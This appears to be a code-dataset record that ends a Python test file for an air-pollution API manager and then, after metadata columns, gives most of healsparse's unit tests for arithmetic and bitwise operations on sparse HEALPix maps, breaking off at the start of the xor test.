self.__test_instance, -200, 2.5)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.ozone_around_coords, \
self.__test_instance, 200, 2.5)
def test_no2index_around_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_no2
airpollution_client.AirPollutionHttpClient.get_no2 = \
self.mock_get_no2_returning_no2index_around_coords
result = self.__test_instance.no2index_around_coords(45, 9, interval='day')
airpollution_client.AirPollutionHttpClient.get_no2 = ref_to_original
self.assertTrue(isinstance(result, no2index.NO2Index))
self.assertIsNotNone(result.reference_time)
self.assertIsNotNone(result.reception_time())
loc = result.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(result.no2_samples)
ref_to_original = airpollution_client.AirPollutionHttpClient.get_no2
airpollution_client.AirPollutionHttpClient.get_no2 = \
self.mock_get_no2_returning_no2index_around_coords
result = self.__test_instance.no2index_around_coords(45, 9, interval=None)
airpollution_client.AirPollutionHttpClient.get_no2 = ref_to_original
self.assertTrue(isinstance(result, no2index.NO2Index))
self.assertEqual('year', result.interval)
def test_no2index_around_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.no2index_around_coords, \
self.__test_instance, 43.7, -200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.no2index_around_coords, \
self.__test_instance, 43.7, 200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.no2index_around_coords, \
self.__test_instance, -200, 2.5)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.no2index_around_coords, \
self.__test_instance, 200, 2.5)
def test_so2index_around_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_so2
airpollution_client.AirPollutionHttpClient.get_so2 = \
self.mock_get_so2_returning_so2index_around_coords
result = self.__test_instance.so2index_around_coords(45, 9, interval='day')
airpollution_client.AirPollutionHttpClient.get_so2 = ref_to_original
self.assertTrue(isinstance(result, so2index.SO2Index))
self.assertIsNotNone(result.reference_time())
self.assertIsNotNone(result.reception_time())
loc = result.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(result.so2_samples)
self.assertIsNotNone(result.interval)
ref_to_original = airpollution_client.AirPollutionHttpClient.get_so2
airpollution_client.AirPollutionHttpClient.get_so2 = \
self.mock_get_so2_returning_so2index_around_coords
result = self.__test_instance.so2index_around_coords(45, 9, interval=None)
airpollution_client.AirPollutionHttpClient.get_so2 = ref_to_original
self.assertTrue(isinstance(result, so2index.SO2Index))
self.assertEqual('year', result.interval)
def test_so2index_around_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.so2index_around_coords, \
self.__test_instance, 43.7, -200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.so2index_around_coords, \
self.__test_instance, 43.7, 200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.so2index_around_coords, \
self.__test_instance, -200, 2.5)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.so2index_around_coords, \
self.__test_instance, 200, 2.5)
def test_air_quality_at_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_air_pollution
airpollution_client.AirPollutionHttpClient.get_air_pollution = \
self.mock_get_air_pollution
result = self.__test_instance.air_quality_at_coords(45, 9)
airpollution_client.AirPollutionHttpClient.get_air_pollution = ref_to_original
self.assertTrue(isinstance(result, airstatus.AirStatus))
self.assertIsNotNone(result.reference_time)
self.assertIsNotNone(result.reception_time())
loc = result.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(result.air_quality_data)
def test_air_quality_at_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_at_coords, \
self.__test_instance, 43.7, -200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_at_coords, \
self.__test_instance, 43.7, 200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_at_coords, \
self.__test_instance, -200, 2.5)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_at_coords, \
self.__test_instance, 200, 2.5)
def test_air_quality_forecast_at_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_forecast_air_pollution
airpollution_client.AirPollutionHttpClient.get_forecast_air_pollution = \
self.mock_get_forecast_air_pollution
result = self.__test_instance.air_quality_forecast_at_coords(45, 9)
airpollution_client.AirPollutionHttpClient.get_forecast_air_pollution = ref_to_original
self.assertTrue(isinstance(result, list))
for item in result:
self.assertIsInstance(item, airstatus.AirStatus)
self.assertIsNotNone(item.reference_time)
self.assertIsNotNone(item.reception_time())
loc = item.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(item.air_quality_data)
def test_air_quality_forecast_at_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_forecast_at_coords, \
self.__test_instance, 43.7, -200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_forecast_at_coords, \
self.__test_instance, 43.7, 200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_forecast_at_coords, \
self.__test_instance, -200, 2.5)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_forecast_at_coords, \
self.__test_instance, 200, 2.5)
def test_air_quality_history_at_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_historical_air_pollution
airpollution_client.AirPollutionHttpClient.get_historical_air_pollution = \
self.mock_get_historical_air_pollution
result = self.__test_instance.air_quality_history_at_coords(45, 9, 12345678)
airpollution_client.AirPollutionHttpClient.get_historical_air_pollution = ref_to_original
self.assertTrue(isinstance(result, list))
for item in result:
self.assertIsInstance(item, airstatus.AirStatus)
self.assertIsNotNone(item.reference_time)
self.assertIsNotNone(item.reception_time())
loc = item.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(item.air_quality_data)
def test_air_quality_history_at_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_history_at_coords, \
self.__test_instance, 43.7, -200.0, 12345678, 12349999)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_history_at_coords, \
self.__test_instance, 43.7, 200.0, 12345678, 12349999)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_history_at_coords, \
self.__test_instance, -200, 2.5, 12345678, 12349999)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_history_at_coords, \
self.__test_instance, 200, 2.5, 12345678, 12349999)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_history_at_coords, \
self.__test_instance, 200, 2.5, 'test')
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_history_at_coords, \
self.__test_instance, 200, 2.5, 'test', 'test2')
def test_air_quality_history_at_coords_clips_end_param_to_current_timestamp(self):
now = timestamps.now(timeformat='unix')
end = now + 99999999999
def assert_clipped(obj, params_dict):
self.assertEqual(params_dict['end'], now)
airpollution_client.AirPollutionHttpClient.get_historical_air_pollution = assert_clipped
_ = self.__test_instance.air_quality_history_at_coords(45, 9, 12345678, end=end)
def test_repr(self):
print(self.__test_instance)
| 56.519713
| 124
| 0.734162
| 1,697
| 15,769
| 6.427814
| 0.074249
| 0.049505
| 0.06454
| 0.118262
| 0.90264
| 0.886047
| 0.853502
| 0.795838
| 0.759901
| 0.748992
| 0
| 0.030334
| 0.193037
| 15,769
| 278
| 125
| 56.723022
| 0.826876
| 0.002663
| 0
| 0.618257
| 0
| 0
| 0.00407
| 0
| 0
| 0
| 0
| 0
| 0.40249
| 1
| 0.107884
| false
| 0
| 0.045643
| 0.029046
| 0.190871
| 0.004149
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d37cadfaece0fd7e2444e0042d713e0e2bd7dcd0
| 42,518
|
py
|
Python
|
tests/test_operations.py
|
LSSTDESC/healsparse
|
f6b15f570ab6335328e34006f69c3919d9fcf1c8
|
[
"BSD-3-Clause"
] | 8
|
2019-05-06T11:42:41.000Z
|
2021-10-08T14:57:12.000Z
|
tests/test_operations.py
|
LSSTDESC/healsparse
|
f6b15f570ab6335328e34006f69c3919d9fcf1c8
|
[
"BSD-3-Clause"
] | 75
|
2019-03-01T23:25:26.000Z
|
2022-01-29T21:40:27.000Z
|
tests/test_operations.py
|
LSSTDESC/healsparse
|
f6b15f570ab6335328e34006f69c3919d9fcf1c8
|
[
"BSD-3-Clause"
] | 3
|
2020-01-30T19:10:19.000Z
|
2022-03-08T14:57:38.000Z
|
from __future__ import division, absolute_import, print_function
import unittest
import numpy.testing as testing
import numpy as np
import healpy as hp
from numpy import random
import healsparse
class OperationsTestCase(unittest.TestCase):
def test_sum(self):
"""
Test map addition.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test adding two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Intersection addition
# sum 2
added_map_intersection = healsparse.sum_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_sum_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_sum_intersection[gd] = hpmap1[gd] + hpmap2[gd]
testing.assert_almost_equal(hpmap_sum_intersection, added_map_intersection.generate_healpix_map())
# sum 3
added_map_intersection = healsparse.sum_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_sum_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_sum_intersection[gd] = hpmap1[gd] + hpmap2[gd] + hpmap3[gd]
testing.assert_almost_equal(hpmap_sum_intersection, added_map_intersection.generate_healpix_map())
# Union addition
# sum 2
added_map_union = healsparse.sum_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN))
hpmap_sum_union = np.zeros_like(hpmap1) + hp.UNSEEN
# This hack works because we don't have summands going below zero...
hpmap_sum_union[gd] = np.clip(hpmap1[gd], 0.0, None) + np.clip(hpmap2[gd], 0.0, None)
testing.assert_almost_equal(hpmap_sum_union, added_map_union.generate_healpix_map())
# sum 3
added_map_union = healsparse.sum_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN) | (hpmap3 > hp.UNSEEN))
hpmap_sum_union = np.zeros_like(hpmap1) + hp.UNSEEN
# This hack works because we don't have summands going below zero...
hpmap_sum_union[gd] = (np.clip(hpmap1[gd], 0.0, None) +
np.clip(hpmap2[gd], 0.0, None) +
np.clip(hpmap3[gd], 0.0, None))
testing.assert_almost_equal(hpmap_sum_union, added_map_union.generate_healpix_map())
# Test adding an int constant to a map
added_map = sparse_map1 + 2
hpmapAdd2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmapAdd2[gd] = hpmap1[gd] + 2
testing.assert_almost_equal(hpmapAdd2, added_map.generate_healpix_map())
# Test adding a float constant to a map
added_map = sparse_map1 + 2.0
hpmapAdd2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmapAdd2[gd] = hpmap1[gd] + 2.0
testing.assert_almost_equal(hpmapAdd2, added_map.generate_healpix_map())
# Test adding a float constant to a map, in place
sparse_map1 += 2.0
testing.assert_almost_equal(hpmapAdd2, sparse_map1.generate_healpix_map())
def test_product(self):
"""
Test map products.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test adding two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# _intersection product
# product of 2
product_map_intersection = healsparse.product_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_product_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_product_intersection[gd] = hpmap1[gd] * hpmap2[gd]
testing.assert_almost_equal(hpmap_product_intersection,
product_map_intersection.generate_healpix_map())
# product of 3
product_map_intersection = healsparse.product_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_product_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_product_intersection[gd] = hpmap1[gd] * hpmap2[gd] * hpmap3[gd]
testing.assert_almost_equal(hpmap_product_intersection,
product_map_intersection.generate_healpix_map())
# Union product
# product of 2
product_map_union = healsparse.product_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN))
hpmap_product_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_product_union[gd] = 1.0
gd1, = np.where(hpmap1[gd] > hp.UNSEEN)
hpmap_product_union[gd[gd1]] *= hpmap1[gd[gd1]]
gd2, = np.where(hpmap2[gd] > hp.UNSEEN)
hpmap_product_union[gd[gd2]] *= hpmap2[gd[gd2]]
testing.assert_almost_equal(hpmap_product_union, product_map_union.generate_healpix_map())
# product 3
product_map_union = healsparse.product_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN) | (hpmap3 > hp.UNSEEN))
hpmap_product_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_product_union[gd] = 1.0
gd1, = np.where(hpmap1[gd] > hp.UNSEEN)
hpmap_product_union[gd[gd1]] *= hpmap1[gd[gd1]]
gd2, = np.where(hpmap2[gd] > hp.UNSEEN)
hpmap_product_union[gd[gd2]] *= hpmap2[gd[gd2]]
gd3, = np.where(hpmap3[gd] > hp.UNSEEN)
hpmap_product_union[gd[gd3]] *= hpmap3[gd[gd3]]
testing.assert_almost_equal(hpmap_product_union, product_map_union.generate_healpix_map())
# Test multiplying an int constant to a map
mult_map = sparse_map1 * 2
hpmap_product2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_product2[gd] = hpmap1[gd] * 2
testing.assert_almost_equal(hpmap_product2, mult_map.generate_healpix_map())
# Test multiplying a float constant to a map
mult_map = sparse_map1 * 2.0
hpmap_product2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_product2[gd] = hpmap1[gd] * 2.0
testing.assert_almost_equal(hpmap_product2, mult_map.generate_healpix_map())
# Test adding a float constant to a map, in place
sparse_map1 *= 2.0
testing.assert_almost_equal(hpmap_product2, sparse_map1.generate_healpix_map())
def test_product_integer(self):
"""
Test map products.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
sentinel = 0
maxval = 100
# Test adding two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(
nside_coverage,
nside_map,
np.int64,
sentinel=sentinel,
)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = random.randint(low=1, high=maxval, size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = sparse_map1.valid_pixels
hpmap1[vpix] = sparse_map1.get_values_pix(vpix)
sparse_map2 = healsparse.HealSparseMap.make_empty(
nside_coverage,
nside_map,
np.int64,
sentinel=sentinel,
)
pixel2 = np.arange(15000, 25000)
values2 = random.randint(low=1, high=maxval, size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = sparse_map2.valid_pixels
hpmap2[vpix] = sparse_map2.get_values_pix(vpix)
sparse_map3 = healsparse.HealSparseMap.make_empty(
nside_coverage,
nside_map,
np.int64,
sentinel=sentinel,
)
pixel3 = np.arange(16000, 25000)
values3 = random.randint(low=1, high=maxval, size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = sparse_map3.valid_pixels
hpmap3[vpix] = sparse_map3.get_values_pix(vpix)
# _intersection product
# product of 2
product_map_intersection = healsparse.product_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > sentinel) & (hpmap2 > sentinel))
hpmap_product_intersection = np.zeros_like(hpmap1)
hpmap_product_intersection[gd] = hpmap1[gd] * hpmap2[gd]
pmap = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = product_map_intersection.valid_pixels
pmap[vpix] = product_map_intersection.get_values_pix(vpix)
testing.assert_equal(hpmap_product_intersection, pmap)
# product of 3
product_map_intersection = healsparse.product_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > sentinel) & (hpmap2 > sentinel) & (hpmap3 > sentinel))
hpmap_product_intersection = np.zeros_like(hpmap1)
hpmap_product_intersection[gd] = hpmap1[gd] * hpmap2[gd] * hpmap3[gd]
pmap = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = product_map_intersection.valid_pixels
pmap[vpix] = product_map_intersection.get_values_pix(vpix)
testing.assert_equal(hpmap_product_intersection, pmap)
# _union product
# product of 2
product_map_union = healsparse.product_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > sentinel) | (hpmap2 > sentinel))
hpmap_product_union = np.zeros_like(hpmap1)
hpmap_product_union[gd] = 1
gd1, = np.where(hpmap1[gd] > sentinel)
hpmap_product_union[gd[gd1]] *= hpmap1[gd[gd1]]
gd2, = np.where(hpmap2[gd] > sentinel)
hpmap_product_union[gd[gd2]] *= hpmap2[gd[gd2]]
pmap = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = product_map_union.valid_pixels
pmap[vpix] = product_map_union.get_values_pix(vpix)
testing.assert_equal(hpmap_product_union, pmap)
# product 3
product_map_union = healsparse.product_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > sentinel) | (hpmap2 > sentinel) | (hpmap3 > sentinel))
hpmap_product_union = np.zeros_like(hpmap1)
hpmap_product_union[gd] = 1
gd1, = np.where(hpmap1[gd] > sentinel)
hpmap_product_union[gd[gd1]] *= hpmap1[gd[gd1]]
gd2, = np.where(hpmap2[gd] > sentinel)
hpmap_product_union[gd[gd2]] *= hpmap2[gd[gd2]]
gd3, = np.where(hpmap3[gd] > sentinel)
hpmap_product_union[gd[gd3]] *= hpmap3[gd[gd3]]
pmap = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = product_map_union.valid_pixels
pmap[vpix] = product_map_union.get_values_pix(vpix)
testing.assert_equal(hpmap_product_union, pmap)
# Test multiplying an int constant to a map
mult_map = sparse_map1 * 2
hpmap_product2 = np.zeros_like(hpmap1)
gd, = np.where(hpmap1 > sentinel)
hpmap_product2[gd] = hpmap1[gd] * 2
pmap = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = mult_map.valid_pixels
pmap[vpix] = mult_map.get_values_pix(vpix)
testing.assert_equal(hpmap_product2, pmap)
def test_or(self):
"""
Test map bitwise or.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
for dtype in [np.int64, np.uint64]:
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
# Get a random list of integers
values1 = np.random.poisson(size=pixel1.size, lam=2).astype(dtype)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype)
pixel2 = np.arange(15000, 25000)
values2 = np.random.poisson(size=pixel2.size, lam=2).astype(dtype)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype)
pixel3 = np.arange(16000, 25000)
values3 = np.random.poisson(size=pixel3.size, lam=2).astype(dtype)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# _intersection or
# or 2
or_map_intersection = healsparse.or_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_or_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_or_intersection[gd] = hpmap1[gd].astype(dtype) | hpmap2[gd].astype(dtype)
testing.assert_almost_equal(hpmap_or_intersection, or_map_intersection.generate_healpix_map())
# or 3
or_map_intersection = healsparse.or_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_or_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_or_intersection[gd] = (hpmap1[gd].astype(dtype) |
hpmap2[gd].astype(dtype) |
hpmap3[gd].astype(dtype))
testing.assert_almost_equal(hpmap_or_intersection, or_map_intersection.generate_healpix_map())
# Union or
# or 2
or_map_union = healsparse.or_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN))
hpmap_or_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_or_union[gd] = (np.clip(hpmap1[gd], 0.0, None).astype(dtype) |
np.clip(hpmap2[gd], 0.0, None).astype(dtype))
testing.assert_almost_equal(hpmap_or_union, or_map_union.generate_healpix_map())
# or 3
or_map_union = healsparse.or_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN) | (hpmap3 > hp.UNSEEN))
hpmap_or_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_or_union[gd] = (np.clip(hpmap1[gd], 0.0, None).astype(dtype) |
np.clip(hpmap2[gd], 0.0, None).astype(dtype) |
np.clip(hpmap3[gd], 0.0, None).astype(dtype))
testing.assert_almost_equal(hpmap_or_union, or_map_union.generate_healpix_map())
# Test orring an int constant to a map
or_map = sparse_map1 | 2
hpmap_or2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_or2[gd] = hpmap1[gd].astype(dtype) | 2
testing.assert_almost_equal(hpmap_or2, or_map.generate_healpix_map())
# Test orring an int constant to a map, in place
sparse_map1 |= 2
testing.assert_almost_equal(hpmap_or2, sparse_map1.generate_healpix_map())
def test_and(self):
"""
Test map bitwise and.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
for dtype in [np.int64, np.uint64]:
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
# Get a random list of integers
values1 = np.random.poisson(size=pixel1.size, lam=2).astype(dtype)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype)
pixel2 = np.arange(15000, 25000)
values2 = np.random.poisson(size=pixel2.size, lam=2).astype(dtype)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype)
pixel3 = np.arange(16000, 25000)
values3 = np.random.poisson(size=pixel3.size, lam=2).astype(dtype)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# _intersection and
# and 2
and_map_intersection = healsparse.and_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_and_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_and_intersection[gd] = hpmap1[gd].astype(dtype) & hpmap2[gd].astype(dtype)
if dtype == np.uint64:
# For uint, we cannot tell the difference between 0 and UNSEEN
bd, = np.where(hpmap_and_intersection == 0)
hpmap_and_intersection[bd] = hp.UNSEEN
testing.assert_almost_equal(hpmap_and_intersection, and_map_intersection.generate_healpix_map())
# and 3
and_map_intersection = healsparse.and_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_and_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_and_intersection[gd] = (hpmap1[gd].astype(dtype) &
hpmap2[gd].astype(dtype) &
hpmap3[gd].astype(dtype))
if dtype == np.uint64:
# For uint, we cannot tell the difference between 0 and UNSEEN
bd, = np.where(hpmap_and_intersection == 0)
hpmap_and_intersection[bd] = hp.UNSEEN
testing.assert_almost_equal(hpmap_and_intersection, and_map_intersection.generate_healpix_map())
# Union and
# and 2
and_map_union = healsparse.and_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN))
hpmap_and_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_and_union[gd] = -1.0
gd1, = np.where(hpmap1[gd] > hp.UNSEEN)
hpmap_and_union[gd[gd1]] = (hpmap_and_union[gd[gd1]].astype(np.int64) &
hpmap1[gd[gd1]].astype(np.int64))
gd2, = np.where(hpmap2[gd] > hp.UNSEEN)
hpmap_and_union[gd[gd2]] = (hpmap_and_union[gd[gd2]].astype(np.int64) &
hpmap2[gd[gd2]].astype(np.int64))
if dtype == np.uint64:
# For uint, we cannot tell the difference between 0 and UNSEEN
bd, = np.where(hpmap_and_union == 0)
hpmap_and_union[bd] = hp.UNSEEN
testing.assert_almost_equal(hpmap_and_union, and_map_union.generate_healpix_map())
# and 3
and_map_union = healsparse.and_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN) | (hpmap3 > hp.UNSEEN))
hpmap_and_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_and_union[gd] = -1.0
gd1, = np.where(hpmap1[gd] > hp.UNSEEN)
hpmap_and_union[gd[gd1]] = (hpmap_and_union[gd[gd1]].astype(np.int64) &
hpmap1[gd[gd1]].astype(np.int64))
gd2, = np.where(hpmap2[gd] > hp.UNSEEN)
hpmap_and_union[gd[gd2]] = (hpmap_and_union[gd[gd2]].astype(np.int64) &
hpmap2[gd[gd2]].astype(np.int64))
gd3, = np.where(hpmap3[gd] > hp.UNSEEN)
hpmap_and_union[gd[gd3]] = (hpmap_and_union[gd[gd3]].astype(np.int64) &
hpmap3[gd[gd3]].astype(np.int64))
if dtype == np.uint64:
# For uint, we cannot tell the difference between 0 and UNSEEN
bd, = np.where(hpmap_and_union == 0)
hpmap_and_union[bd] = hp.UNSEEN
testing.assert_almost_equal(hpmap_and_union, and_map_union.generate_healpix_map())
# Test anding an int constant to a map
and_map = sparse_map1 & 2
hpmap_and2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_and2[gd] = hpmap1[gd].astype(dtype) & 2
if dtype == np.uint64:
# For uint, we cannot tell the difference between 0 and UNSEEN
bd, = np.where(hpmap_and2 == 0)
hpmap_and2[bd] = hp.UNSEEN
testing.assert_almost_equal(hpmap_and2, and_map.generate_healpix_map())
# Test anding an int constant to a map, in place
sparse_map1 &= 2
testing.assert_almost_equal(hpmap_and2, sparse_map1.generate_healpix_map())
def test_xor(self):
"""
Test map bitwise xor.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
for dtype in [np.int64, np.uint64]:
